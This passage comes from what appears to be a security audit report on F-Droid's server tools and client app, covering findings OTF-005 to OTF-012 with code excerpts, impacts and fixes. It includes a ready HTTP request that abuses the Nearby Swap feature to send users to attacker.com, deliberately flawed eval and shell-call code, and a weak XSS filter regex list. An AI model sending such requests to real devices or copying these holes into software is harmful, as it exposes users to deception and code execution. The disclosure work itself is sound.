<div style="color: #444444; font-family: Helvetica; font-size: 13pt; margin-bottom: 0.5cm; padding-left: 2mm;"><table width="100%"><tr><td valign="top" width="45.36"><div style="line-height: 0.7cm;"><span>4.1.5</span></div></td><td width="11.34">&nbsp;</td><td valign="top"><div style="line-height: 0.7cm;">OTF-005 &#8212; Code Injection in Fdroidserver Checkupdates Through Eval'ed User Supplied Data</div></td></tr></table></div><table style="background-color: #ededed; border-color: #e4e4e4; margin-bottom: 8mm; padding-left: -8pt; border-style: solid; border-left-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-top: 4px solid #CC4900;" valign="top"><tbody><tr><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top" colspan="2"><div style="margin-bottom: 5pt;"><span style="font-weight: bold;">Vulnerability ID: </span>OTF-005</div></td></tr><tr><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top" colspan="2"><div style="margin-bottom: 5pt;"><span style="font-weight: bold;">Vulnerability type: </span>Code Execution</div></td></tr><tr><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top" colspan="2"><div style="margin-bottom: 5pt;"><span style="font-weight: bold;">Threat level: </span>High</div></td></tr></tbody></table>
<div style="color: black; font-family: Helvetica; font-size: 12pt; margin-bottom: 0.5cm;">Description:</div><div style="margin-bottom: 8mm; line-height: 6mm;"><div style="margin-bottom: 5pt; line-height: 6mm;">The value of VercodeOperation supplied in the metadata of the app by the adversary is <span style="color: #444444; font-family: Courier; font-size: 85%; background-color: #eeeeee;">eval</span>-ed in the fdroidserver script <span style="color: #444444; font-family: Courier; font-size: 85%; background-color: #eeeeee;">checkupdates.py</span>.</div>
</div>
<div style="color: black; font-family: Helvetica; font-size: 12pt; margin-bottom: 0.5cm;">Technical description:</div><div style="margin-bottom: 8mm; line-height: 6mm;">
<div style="margin-bottom: 5pt; line-height: 6mm;">excerpt from <span style="color: #444444; font-family: Courier; font-size: 85%; background-color: #eeeeee;">checkupdates.py:425</span>:</div>
<pre><div style="color: #444444; font-family: Courier; font-size: 8pt; background-color: #ededed; border-color: #e4e4e4; border-style: solid; border-width: 1pt; margin-bottom: 4mm; padding: 4pt;">op = app.VercodeOperation.replace("%c", oldvercode)
vercode = str(eval(op))</div></pre>
</div>
<div style="color: black; font-family: Helvetica; font-size: 12pt; margin-bottom: 0.5cm;">Impact:</div><div style="margin-bottom: 8mm; line-height: 6mm;"><div style="margin-bottom: 5pt; line-height: 6mm;">High: Arbitrary code can be executed</div></div>
<div style="color: black; font-family: Helvetica; font-size: 12pt; margin-bottom: 0.5cm;">Recommendation:</div><div style="margin-bottom: 8mm; line-height: 6mm;"><div style="margin-bottom: 1.3cm; line-height: 6mm;">Create a simple interpreter for the allowed rules, or do strict validation of the input.</div></div>
</div>
         <a name="f27-code-injection-via-malicious-appid-in-fdroidserver-build-py"></a><div style="margin-bottom: 1.3cm;">
<div style="color: #444444; font-family: Helvetica; font-size: 13pt; margin-bottom: 0.5cm; padding-left: 2mm;"><table width="100%"><tr><td valign="top" width="45.36"><div style="line-height: 0.7cm;"><span>4.1.6</span></div></td><td width="11.34">&nbsp;</td><td valign="top"><div style="line-height: 0.7cm;">OTF-006 &#8212; Code Injection Via Malicious Appid in Fdroidserver Build.py</div></td></tr></table></div><table style="background-color: #ededed; border-color: #e4e4e4; margin-bottom: 8mm; padding-left: -8pt; border-style: solid; border-left-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-top: 4px solid #CC4900;" valign="top"><tbody><tr><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top" colspan="2"><div style="margin-bottom: 5pt;"><span style="font-weight: bold;">Vulnerability ID: </span>OTF-006</div></td></tr><tr><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top" colspan="2"><div style="margin-bottom: 5pt;"><span style="font-weight: bold;">Vulnerability type: </span>Code Execution</div></td></tr><tr><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top" colspan="2"><div style="margin-bottom: 5pt;"><span style="font-weight: bold;">Threat level: </span>High</div></td></tr></tbody></table>
<div style="color: black; font-family: Helvetica; font-size: 12pt; margin-bottom: 0.5cm;">Description:</div><div style="margin-bottom: 8mm; line-height: 6mm;"><div style="margin-bottom: 5pt; line-height: 6mm;">A maliciously crafted appid can be used to inject code in fdroidserver <span style="color: #444444; font-family: Courier; font-size: 85%; background-color: #eeeeee;">build.py:1274</span></div>
</div>
<div style="color: black; font-family: Helvetica; font-size: 12pt; margin-bottom: 0.5cm;">Technical description:</div><div style="margin-bottom: 8mm; line-height: 6mm;">
  <div style="margin-bottom: 5pt; line-height: 6mm;"><span style="color: #444444; font-family: Courier; font-size: 85%; background-color: #eeeeee;">build.py</span> uses the appid as a parameter passed to the shell</div>
<pre><div style="color: #444444; font-family: Courier; font-size: 8pt; background-color: #ededed; border-color: #e4e4e4; border-style: solid; border-width: 1pt; margin-bottom: 4mm; padding: 4pt;">subprocess.call("fdroid publish {0}".format(app.id))</div></pre>
</div>
<div style="color: black; font-family: Helvetica; font-size: 12pt; margin-bottom: 0.5cm;">Impact:</div><div style="margin-bottom: 8mm; line-height: 6mm;"><div style="margin-bottom: 5pt; line-height: 6mm;">High: Arbitrary Code Execution</div></div>
<div style="color: black; font-family: Helvetica; font-size: 12pt; margin-bottom: 0.5cm;">Recommendation:</div><div style="margin-bottom: 8mm; line-height: 6mm;"><div style="margin-bottom: 1.3cm; line-height: 6mm;">Validate appids</div></div>
</div>
         <a name="f29-javascript-injection-into-htmlified-package-descriptions-in-fdroidserver-metadata-py"></a><div style="margin-bottom: 1.3cm;">
<div style="color: #444444; font-family: Helvetica; font-size: 13pt; margin-bottom: 0.5cm; padding-left: 2mm;"><table width="100%"><tr><td valign="top" width="45.36"><div style="line-height: 0.7cm;"><span>4.1.7</span></div></td><td width="11.34">&nbsp;</td><td valign="top"><div style="line-height: 0.7cm;">OTF-007 &#8212; Javascript Injection Into HTMLified Descriptions in Fdroidserver Metadata</div></td></tr></table></div><table style="background-color: #ededed; border-color: #e4e4e4; margin-bottom: 8mm; padding-left: -8pt; border-style: solid; border-left-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-top: 4px solid #CC4900;" valign="top"><tbody><tr><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top" colspan="2"><div style="margin-bottom: 5pt;"><span style="font-weight: bold;">Vulnerability ID: </span>OTF-007</div></td></tr><tr><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top" colspan="2"><div style="margin-bottom: 5pt;"><span style="font-weight: bold;">Vulnerability type: </span>Code Execution</div></td></tr><tr><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top" colspan="2"><div style="margin-bottom: 5pt;"><span style="font-weight: bold;">Threat level: </span>High</div></td></tr></tbody></table>
<div style="color: black; font-family: Helvetica; font-size: 12pt; margin-bottom: 0.5cm;">Description:</div><div style="margin-bottom: 8mm; line-height: 6mm;"><div style="margin-bottom: 5pt; line-height: 6mm;">The <span style="color: #444444; font-family: Courier; font-size: 85%; background-color: #eeeeee;">linkify</span> function of <span style="color: #444444; font-family: Courier; font-size: 85%; background-color: #eeeeee;">DescriptionFormatter</span> in fdroidserver <span style="color: #444444; font-family: Courier; font-size: 85%; background-color: #eeeeee;">metadata.py</span> allows for injection of javascript into the description of packages.</div>
</div>
<div style="color: black; font-family: Helvetica; font-size: 12pt; margin-bottom: 0.5cm;">Technical description:</div><div style="margin-bottom: 8mm; line-height: 6mm;">
<div style="margin-bottom: 5pt; line-height: 6mm;">excerpt from `metadata.py:557</div>
<pre><div style="color: #444444; font-family: Courier; font-size: 8pt; background-color: #ededed; border-color: #e4e4e4; border-style: solid; border-width: 1pt; margin-bottom: 4mm; padding: 4pt;">index = txt.find("]")
...
url = txt[1:index]
index2 = url.find(' ')
...
else:
    urltxt = url[index2 + 1:]
    url = url[:index2]
    ...
res_html += '&lt;a href="' + url + '"&gt;' + html.escape(urltxt, quote=False) + '&lt;/a&gt;'</div></pre>
</div>
<div style="color: black; font-family: Helvetica; font-size: 12pt; margin-bottom: 0.5cm;">Impact:</div><div style="margin-bottom: 8mm; line-height: 6mm;"><div style="margin-bottom: 5pt; line-height: 6mm;">High: attacker can inject code into visitors browser</div></div>
<div style="color: black; font-family: Helvetica; font-size: 12pt; margin-bottom: 0.5cm;">Recommendation:</div><div style="margin-bottom: 8mm; line-height: 6mm;">
<div style="margin-bottom: 1.3cm; line-height: 6mm;">Recommendation: validate the URL and disallow schemas like <span style="color: #444444; font-family: Courier; font-size: 85%; background-color: #eeeeee;">javascript:</span> and <span style="color: #444444; font-family: Courier; font-size: 85%; background-color: #eeeeee;">file:</span>, possibly using a whitelist.</div>
</div>
</div>
         <a name="f33-bluetoothserver-java-request-uri-included-in-response"></a><div style="margin-bottom: 1.3cm;">
<div style="color: #444444; font-family: Helvetica; font-size: 13pt; margin-bottom: 0.5cm; padding-left: 2mm;"><table width="100%"><tr><td valign="top" width="45.36"><div style="line-height: 0.7cm;"><span>4.1.8</span></div></td><td width="11.34">&nbsp;</td><td valign="top"><div style="line-height: 0.7cm;">OTF-008 &#8212; Unvalidated User Input Included in Response</div></td></tr></table></div><table style="background-color: #ededed; border-color: #e4e4e4; margin-bottom: 8mm; padding-left: -8pt; border-style: solid; border-left-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-top: 4px solid #CC4900;" valign="top"><tbody><tr><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top" colspan="2"><div style="margin-bottom: 5pt;"><span style="font-weight: bold;">Vulnerability ID: </span>OTF-008</div></td></tr><tr><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top" colspan="2"><div style="margin-bottom: 5pt;"><span style="font-weight: bold;">Vulnerability type: </span>html/JavaScript Injection</div></td></tr><tr><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top" colspan="2"><div style="margin-bottom: 5pt;"><span style="font-weight: bold;">Threat level: </span>High</div></td></tr></tbody></table>
<div style="color: black; font-family: Helvetica; font-size: 12pt; margin-bottom: 0.5cm;">Description:</div><div style="margin-bottom: 8mm; line-height: 6mm;"><div style="margin-bottom: 5pt; line-height: 6mm;">BluetoothServer.java: Request URI Included in Response</div>
</div>
<div style="color: black; font-family: Helvetica; font-size: 12pt; margin-bottom: 0.5cm;">Technical description:</div><div style="margin-bottom: 8mm; line-height: 6mm;"><div style="margin-bottom: 5pt; line-height: 6mm;">In file net/bluetooth/BluetoothServer.java, the server prepares response by including the request URI verbatim, without any validation.</div>

<pre><div style="color: #444444; font-family: Courier; font-size: 8pt; background-color: #ededed; border-color: #e4e4e4; border-style: solid; border-width: 1pt; margin-bottom: 4mm; padding: 4pt;">Line 194:
        private Response respond(Map&lt;String, String&gt; headers, String uri) {
...
...
Lines 222-226:
            if (f.isDirectory() &amp;&amp; !uri.endsWith("/")) {
                uri += "/";
                Response res = createResponse(NanoHTTPD.Response.Status.REDIRECT, NanoHTTPD.MIME_HTML,
                        "&lt;html&gt;&lt;body&gt;Redirected: &lt;a href=\"" +                             uri + "\"&gt;" + uri + "&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;");
                res.addHeader("Location", uri);</div></pre></div>
<div style="color: black; font-family: Helvetica; font-size: 12pt; margin-bottom: 0.5cm;">Impact:</div><div style="margin-bottom: 8mm; line-height: 6mm;"><div style="margin-bottom: 5pt; line-height: 6mm;">Reflected XSS leading to client side information disclosure</div></div>
<div style="color: black; font-family: Helvetica; font-size: 12pt; margin-bottom: 0.5cm;">Recommendation:</div><div style="margin-bottom: 8mm; line-height: 6mm;"><div style="margin-bottom: 5pt; line-height: 6mm;">User supplied URI should be parsed and components validated before including it in the response.</div>
<div style="margin-bottom: 1.3cm; line-height: 6mm;">Alternatively, URLEncode or httpencode the URI.</div></div>
</div>
         <a name="f39-trustonfirstuse-tofu-usage"></a><div style="margin-bottom: 1.3cm;">
<div style="color: #444444; font-family: Helvetica; font-size: 13pt; margin-bottom: 0.5cm; padding-left: 2mm;"><table width="100%"><tr><td valign="top" width="45.36"><div style="line-height: 0.7cm;"><span>4.1.9</span></div></td><td width="11.34">&nbsp;</td><td valign="top"><div style="line-height: 0.7cm;">OTF-009 &#8212; Applicatioin uses TrustOnFirstUse (TOFU) Usage unverified signing certificate</div></td></tr></table></div><table style="background-color: #ededed; border-color: #e4e4e4; margin-bottom: 8mm; padding-left: -8pt; border-style: solid; border-left-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-top: 4px solid #CC4900;" valign="top"><tbody><tr><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top" colspan="2"><div style="margin-bottom: 5pt;"><span style="font-weight: bold;">Vulnerability ID: </span>OTF-009</div></td></tr><tr><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top" colspan="2"><div style="margin-bottom: 5pt;"><span style="font-weight: bold;">Vulnerability type: </span>Unverified trust</div></td></tr><tr><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top" colspan="2"><div style="margin-bottom: 5pt;"><span style="font-weight: bold;">Threat level: </span>High</div></td></tr></tbody></table>
<div style="color: black; font-family: Helvetica; font-size: 12pt; margin-bottom: 0.5cm;">Description:</div><div style="margin-bottom: 8mm; line-height: 6mm;"><div style="margin-bottom: 5pt; line-height: 6mm;">Applicatioin uses TrustOnFirstUse (TOFU) potentially using unverified signing certificate.</div>
</div>
<div style="color: black; font-family: Helvetica; font-size: 12pt; margin-bottom: 0.5cm;">Technical description:</div><div style="margin-bottom: 8mm; line-height: 6mm;"><div style="margin-bottom: 5pt; line-height: 6mm;"> The verifySigningCertificate() function allows non-verified (and non-verifiable) new certificate into the DB. This code applies the TOFU - trust on first use.</div>
<div style="margin-bottom: 5pt; line-height: 6mm;">Trust On First Use is useful to establish initial contact where apriori shared key is not available - or can not be available. This works ok if a user is prompted to decide whether presented key is to be trusted. For example, the first SSH connection from a client to a server prompts the user whether the certificate presented by the server is trusted.</div>
<div style="margin-bottom: 5pt; line-height: 6mm;">In case of fdroid app, it appears that the TOFU key is trusted without prompt to user. The TOFU key appears to be persisted in the the repo database thus making the TOFU key permanently trusted.</div>
<div style="margin-bottom: 5pt; line-height: 6mm;">In file IndexV1Updater.java:</div>

<pre><div style="color: #444444; font-family: Courier; font-size: 8pt; background-color: #ededed; border-color: #e4e4e4; border-style: solid; border-width: 1pt; margin-bottom: 4mm; padding: 4pt;">243:        X509Certificate certificate = getSigningCertFromJar(indexEntry);
        verifySigningCertificate(certificate);

417:
       if (repo.signingCertificate == null) {
            if (repo.fingerprint != null) {
                String fingerprintFromJar = Utils.calcFingerprint(rawCertFromJar);
                if (!repo.fingerprint.equalsIgnoreCase(fingerprintFromJar)) {
                    throw new SigningException(repo,
                            "Supplied certificate fingerprint does not match!");
                }
            }
            Utils.debugLog(TAG, "Saving new signing certificate to database for " + repo.address);
            ContentValues values = new ContentValues(2);
            values.put(Schema.RepoTable.Cols.LAST_UPDATED, Utils.formatDate(new Date(), ""));
            values.put(Schema.RepoTable.Cols.SIGNING_CERT, Hasher.hex(rawCertFromJar));
            RepoProvider.Helper.update(context, repo, values);
            repo.signingCertificate = certFromJar;
        }
</div></pre>
<div style="margin-bottom: 5pt; line-height: 6mm;">In file RepoUpdater.java, while processing downloaded jar file (public method processDownloadedFile()starting at line 201):</div>
<pre><div style="color: #444444; font-family: Courier; font-size: 8pt; background-color: #ededed; border-color: #e4e4e4; border-style: solid; border-width: 1pt; margin-bottom: 4mm; padding: 4pt;">Line 237: assertSigningCertFromXmlCorrect();
...
...
Line 280: private void assertSigningCertFromXmlCorrect() throws SigningException {

        // no signing cert read from database, this is the first use
        if (repo.signingCertificate == null) {
            verifyAndStoreTOFUCerts(signingCertFromIndexXml, signingCertFromJar);
        }
...
...
Line 392:
    private void verifyAndStoreTOFUCerts(String certFromIndexXml, X509Certificate rawCertFromJar)
            throws SigningException {
...
...
        Utils.debugLog(TAG, "Saving new signing certificate in the database for " + repo.address);
        ContentValues values = new ContentValues(2);
        values.put(RepoTable.Cols.LAST_UPDATED, Utils.formatDate(new Date(), ""));
        values.put(RepoTable.Cols.SIGNING_CERT, Hasher.hex(rawCertFromJar));
        RepoProvider.Helper.update(context, repo, values);
    }
</div></pre>
<div style="margin-bottom: 5pt; line-height: 6mm;"><span style="font-weight: bold;">Customer response: </span></div><div style="margin-bottom: 5pt; line-height: 6mm;">The TOFU process is a bit more convoluted than it should be, that's for sure. The TOFU prompt is the "Add Repos" prompt, where the fingerprint can either be included from clicking a URL that includes it, like <span style="color: #444444; font-family: Courier; font-size: 85%; background-color: #eeeeee;">https://guardianproject.info/fdroid/repo?fingerprint=B7C2EEFD8DAC7806AF67DFCD92EB18126BC08312A7F2D6F3862E46013C7A6135</span> or by manually typing it in.</div>
<div style="margin-bottom: 5pt; line-height: 6mm;">If there is no fingerprint provided, then yes, the first signing key seen by F-Droid will be the one that it trusted. We decided that if the user hasn't already provided it, then another prompt won't make that more likely.</div>
</div>
<div style="color: black; font-family: Helvetica; font-size: 12pt; margin-bottom: 0.5cm;">Impact:</div><div style="margin-bottom: 8mm; line-height: 6mm;"><div style="margin-bottom: 5pt; line-height: 6mm;">Unverified signing certificate saved to DB makes it easier for future attacks to succeed, thus causing potential device compromise.</div></div>
<div style="color: black; font-family: Helvetica; font-size: 12pt; margin-bottom: 0.5cm;">Recommendation:</div><div style="margin-bottom: 8mm; line-height: 6mm;"><div style="margin-bottom: 5pt; line-height: 6mm;">Use a mechanism similar to asking for pin before pairing two devices through BlueTooth, for mobile based repos.</div>
<div style="margin-bottom: 1.3cm; line-height: 6mm;">For non-mobile based repos, the TOFU key should not be stored permanently.</div></div>
</div>
         <a name="f49--fdroid-client-exploiting-nearby-swap-feature-to-show-malicious-prompt-to-users-or-redirect-to-malicious-sites"></a><div style="margin-bottom: 1.3cm;">
<div style="color: #444444; font-family: Helvetica; font-size: 13pt; margin-bottom: 0.5cm; padding-left: 2mm;"><table width="100%"><tr><td valign="top" width="45.36"><div style="line-height: 0.7cm;"><span>4.1.10</span></div></td><td width="11.34">&nbsp;</td><td valign="top"><div style="line-height: 0.7cm;">OTF-010 &#8212; (fdroid Client) Exploiting "Nearby Swap" Feature to Show Malicious Prompt to Users or Redirect to Malicious Sites</div></td></tr></table></div><table style="background-color: #ededed; border-color: #e4e4e4; margin-bottom: 8mm; padding-left: -8pt; border-style: solid; border-left-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-top: 4px solid #CC4900;" valign="top"><tbody><tr><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top" colspan="2"><div style="margin-bottom: 5pt;"><span style="font-weight: bold;">Vulnerability ID: </span>OTF-010</div></td></tr><tr><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top" colspan="2"><div style="margin-bottom: 5pt;"><span style="font-weight: bold;">Vulnerability type: </span>Malicious Use of Feature</div></td></tr><tr><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top" colspan="2"><div style="margin-bottom: 5pt;"><span style="font-weight: bold;">Threat level: </span>High</div></td></tr></tbody></table>
<div style="color: black; font-family: Helvetica; font-size: 12pt; margin-bottom: 0.5cm;">Description:</div><div style="margin-bottom: 8mm; line-height: 6mm;"><div style="margin-bottom: 5pt; line-height: 6mm;">The request to http:https://[client IP]:8888/request-swap is vulnerable as it can be sent by any user, to the client's device. This can be used to show malicious messages and also redirect users.</div>
</div>
<div style="color: black; font-family: Helvetica; font-size: 12pt; margin-bottom: 0.5cm;">Technical description:</div><div style="margin-bottom: 8mm; line-height: 6mm;">
<div style="margin-bottom: 5pt; line-height: 6mm;">While a user is using Nearby Swap feature on the application, it is possible to send the request to [http:https://[client](http:https://%5Bclient) IP]:8888/request-swap with any message. This message will be shown to the user as if it is being sent by fdroid application.</div>
<div style="text-align: center;"><div><img src="{% asset docs/second-audit-report/Screenshot.png %}" height="567"></div><div style="font-style: italic; text-align: center; margin-left: 1cm; margin-right: 1cm; margin-top: 0.5cm;"></div></div>
<div style="margin-bottom: 5pt; line-height: 6mm;"><span style="font-weight: bold;">Exploiting the request to redirect users</span></div>
<div style="margin-bottom: 5pt; line-height: 6mm;">Send the below request to the user's device and if the user will follow "Yes" prompt, he/she will be redirected to the provided domain.</div>
<pre><div style="color: #444444; font-family: Courier; font-size: 8pt; background-color: #ededed; border-color: #e4e4e4; border-style: solid; border-width: 1pt; margin-bottom: 4mm; padding: 4pt;">POST /request-swap HTTP/1.1
Content-Length: 50
Content-Type: application/x-www-form-urlencoded
Host: 192.168.57.33:8888
Connection: close
User-Agent: F-Droid

repo=http:https://attacker.com%2Ffdroid%2Frepo%3Fabc.apk</div></pre>
<div style="text-align: center;"><div><img src="{% asset docs/second-audit-report/attacker_domain.png %}" height="567"></div><div style="font-style: italic; text-align: center; margin-left: 1cm; margin-right: 1cm; margin-top: 0.5cm;"></div></div>
<div style="margin-bottom: 5pt; line-height: 6mm;">The user will get redirected to attacker.com if he/she selects the Yes to prompt.</div>
<div style="text-align: center;"><div><img src="{% asset docs/second-audit-report/Capture.PNG %}" width="340.2"></div><div style="font-style: italic; text-align: center; margin-left: 1cm; margin-right: 1cm; margin-top: 0.5cm;"></div></div>

</div>
<div style="color: black; font-family: Helvetica; font-size: 12pt; margin-bottom: 0.5cm;">Impact:</div><div style="margin-bottom: 8mm; line-height: 6mm;"><div style="margin-bottom: 5pt; line-height: 6mm;">This vulnerability may allow an attacker to show any message on the user's device, looking like fdroid's message. With a bit more user interaction, attacker can even redirect the mobile application user to a website of his own.</div>
</div>
<div style="color: black; font-family: Helvetica; font-size: 12pt; margin-bottom: 0.5cm;">Recommendation:</div><div style="margin-bottom: 8mm; line-height: 6mm;"><div style="margin-bottom: 1.3cm; line-height: 6mm;">The application should validate the message being shown to the user and its origin. Also accepting any message or domain from a user and redirecting the user to a different domain is a very insecure implementation. The users should not be redirected to any domain given by the other user. A validation of this parameter is also needed to be implemented.</div>
</div>
</div>

         <a name="f12-weak-regexps-filtering-xss-and-unwanted-html-tags-in-fdroidserver-lint-py"></a><div style="margin-bottom: 1.3cm;">
<div style="color: #444444; font-family: Helvetica; font-size: 13pt; margin-bottom: 0.5cm; padding-left: 2mm;"><table width="100%"><tr><td valign="top" width="45.36"><div style="line-height: 0.7cm;"><span>4.1.11</span></div></td><td width="11.34">&nbsp;</td><td valign="top"><div style="line-height: 0.7cm;">OTF-011 &#8212; Weak Regexps Filtering XSS and Unwanted HTML Tags in Fdroidserver/lint.py</div></td></tr></table></div><table style="background-color: #ededed; border-color: #e4e4e4; margin-bottom: 8mm; padding-left: -8pt; border-style: solid; border-left-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-top: 4px solid #FE9920;" valign="top"><tbody><tr><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top" colspan="2"><div style="margin-bottom: 5pt;"><span style="font-weight: bold;">Vulnerability ID: </span>OTF-011</div></td></tr><tr><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top" colspan="2"><div style="margin-bottom: 5pt;"><span style="font-weight: bold;">Vulnerability type: </span>Code Execution</div></td></tr><tr><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top" colspan="2"><div style="margin-bottom: 5pt;"><span style="font-weight: bold;">Threat level: </span>Moderate</div></td></tr></tbody></table>
<div style="color: black; font-family: Helvetica; font-size: 12pt; margin-bottom: 0.5cm;">Description:</div><div style="margin-bottom: 8mm; line-height: 6mm;"><div style="margin-bottom: 5pt; line-height: 6mm;">Sanity checks in fdroidserver lint are easily evaded and allow injection of javascript code in descriptions of apps.</div></div>
<div style="color: black; font-family: Helvetica; font-size: 12pt; margin-bottom: 0.5cm;">Technical description:</div><div style="margin-bottom: 8mm; line-height: 6mm;">
  <div style="margin-bottom: 5pt; line-height: 6mm;">The regular expressions used to blacklist certain HTML tags and javascript injections are easily evaded:</div>
  <pre><div style="color: #444444; font-family: Courier; font-size: 8pt; background-color: #ededed; border-color: #e4e4e4; border-style: solid; border-width: 1pt; margin-bottom: 4mm; padding: 4pt;">(re.compile(r'.*&lt;(iframe|link|script).*'),
  ...
  (re.compile(r'''.*\s+src=["']javascript:.*'''),</div></pre>
</div>
<div style="color: black; font-family: Helvetica; font-size: 12pt; margin-bottom: 0.5cm;">Impact:</div><div style="margin-bottom: 8mm; line-height: 6mm;"><div style="margin-bottom: 5pt; line-height: 6mm;">Moderate: Code Injection in websites displaying descriptions of apps.</div></div>
<div style="color: black; font-family: Helvetica; font-size: 12pt; margin-bottom: 0.5cm;">Recommendation:</div><div style="margin-bottom: 8mm; line-height: 6mm;">
  <div style="margin-bottom: 1.3cm; line-height: 6mm;">Deploy bleach against the descriptions.</div>
</div>
</div>
         <a name="f13-key-alias-collisions-can-lead-to-dos-of-publishing-in-fdroidserver"></a><div style="margin-bottom: 1.3cm;">
<div style="color: #444444; font-family: Helvetica; font-size: 13pt; margin-bottom: 0.5cm; padding-left: 2mm;"><table width="100%"><tr><td valign="top" width="45.36"><div style="line-height: 0.7cm;"><span>4.1.12</span></div></td><td width="11.34">&nbsp;</td><td valign="top"><div style="line-height: 0.7cm;">OTF-012 &#8212; Key Alias Collisions Can Lead to DoS of Publishing in Fdroidserver</div></td></tr></table></div><table style="background-color: #ededed; border-color: #e4e4e4; margin-bottom: 8mm; padding-left: -8pt; border-style: solid; border-left-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-top: 4px solid #FE9920;" valign="top"><tbody><tr><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top" colspan="2"><div style="margin-bottom: 5pt;"><span style="font-weight: bold;">Vulnerability ID: </span>OTF-012</div></td></tr><tr><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top" colspan="2"><div style="margin-bottom: 5pt;"><span style="font-weight: bold;">Vulnerability type: </span>Denial of Service</div></td></tr><tr><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top" colspan="2"><div style="margin-bottom: 5pt;"><span style="font-weight: bold;">Threat level: </span>Moderate</div></td></tr></tbody></table>
<div style="color: black; font-family: Helvetica; font-size: 12pt; margin-bottom: 0.5cm;">Description:</div><div style="margin-bottom: 8mm; line-height: 6mm;">By submitting an app to fdroid with a crafted appid it is possible to deny the publishing of new apps to fdroid.</div>
<div style="color: black; font-family: Helvetica; font-size: 12pt; margin-bottom: 0.5cm;">Technical description:</div><div style="margin-bottom: 8mm; line-height: 6mm;">
  <div style="margin-bottom: 5pt; line-height: 6mm;">The function key_alias() calculates the key_alias from the appid by hashing it with <span style="color: #444444; font-family: Courier; font-size: 85%; background-color: #eeeeee;">MD5</span> and taking the first 8 digits of the hex representation of this hash: <span style="color: #444444; font-family: Courier; font-size: 85%; background-color: #eeeeee;">md5.hexlify()[:8]</span>. This is 32bits, but due to the birthday paradox collisions are reasonably cheap to calculate.</div>
  <div style="margin-bottom: 5pt; line-height: 6mm;">In the main() function there is a check for collisions of key aliases, if there is any, the publish script aborts. There is a comment refering to a previous audit stating that chances are neglible of encountering a collision.</div>
  <div style="margin-bottom: 5pt; line-height: 6mm;">We produced two PoC scripts, both use as input an english wordlist (taken from debian /usr/share/dict/words) removing all lines that end in "'s", resulting in a list with 73333 english words.</div>
  <div style="margin-bottom: 5pt; line-height: 6mm;">In PoC-1 (collidemd5-4.py) we generate random english words into appids as long as there is no collision. After approximately 9000 samples we find that it takes about 113.930 random appids until there is a collision.</div>
  <div style="margin-bottom: 5pt; line-height: 6mm;">In PoC-2 we adjust our sampling by taking into account that there are currently about 1500 apps in fdroid, and we try to create a collision with one of these 1500 items. After 1355 samples it takes an average 2.925.625 attempts to collide with one of the 1500 target hashes.</div>
  <div style="margin-bottom: 5pt; line-height: 6mm;">This shows it is feasible to create a collision and create a DoS against the publishing process.</div>
  <div style="margin-bottom: 5pt; line-height: 6mm;">Notable also is that the key_alias() function does allow for overriding the key alias, but the check in the main() function does not take that into account.</div>
  <div style="margin-bottom: 5pt; line-height: 6mm;">publish.py:186 (main())):</div>
